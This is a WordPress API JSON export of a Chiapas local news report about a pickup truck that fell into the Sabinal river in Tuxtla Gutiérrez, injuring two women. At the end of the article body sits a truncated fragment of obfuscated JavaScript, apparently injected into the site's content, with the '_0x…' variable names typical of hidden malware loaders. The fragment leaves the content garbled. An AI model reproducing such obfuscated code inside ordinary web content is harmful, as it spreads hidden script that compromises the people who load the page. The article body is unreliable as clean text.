{"id":8395,"date":"2023-01-30T02:21:40","date_gmt":"2023-01-30T02:21:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8395"},"modified":"2023-01-30T02:21:40","modified_gmt":"2023-01-30T02:21:40","slug":"camioneta-y-ocupantes-caen-al-sabinal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8395","title":{"rendered":"Camioneta y ocupantes caen al Sabinal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045255482-576x1024.jpg\" alt=\"\" class=\"wp-image-8396\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045255482-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045255482-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045255482.jpg 720w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 29 de enero del 2023. Tuxtla Guti\u00e9rrez.- En un hecho ins\u00f3lito, este domingo una camioneta junto con sus ocupantes cayeron a las aguas del Sabinal.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 temprano, a la altura de la Octava Poniente y Quinta Norte del Barrio Guadalupe cuando la conductora de una Honda CRV de color azul circulaba de Sur a Norte cuando se meti\u00f3 a una parte del andador a un costado del r\u00edo pero al no haber salida en lugar de frenar, aceler\u00f3 y termin\u00f3 cayendo al afluente.<\/p>\n\n\n\n<p>Al caer de unos cuatro metros las dos ocupantes resultaron lesionadas y la unidad termin\u00f3 con severos da\u00f1os materiales.<\/p>\n\n\n\n<p>Elementos de tr\u00e1nsito tomaron conocimiento del hecho, y fue una gr\u00faa la encargada de sacar la camioneta siniestrada que fue llevada a un corral\u00f3n en turno para determinar la responsabilidad jur\u00eddica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 29 de enero del 2023. Tuxtla Guti\u00e9rrez.- En un hecho ins\u00f3lito, este domingo una camioneta junto con sus ocupantes cayeron a las aguas del Sabinal. Este hecho ocurri\u00f3 temprano, a la altura de la Octava Poniente y Quinta Norte del Barrio Guadalupe cuando la conductora de una Honda CRV de color &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8396,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8395","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8395"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8395\/revisions"}],"predecessor-version":[{"id":8397,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8395\/revisions\/8397"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8396"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}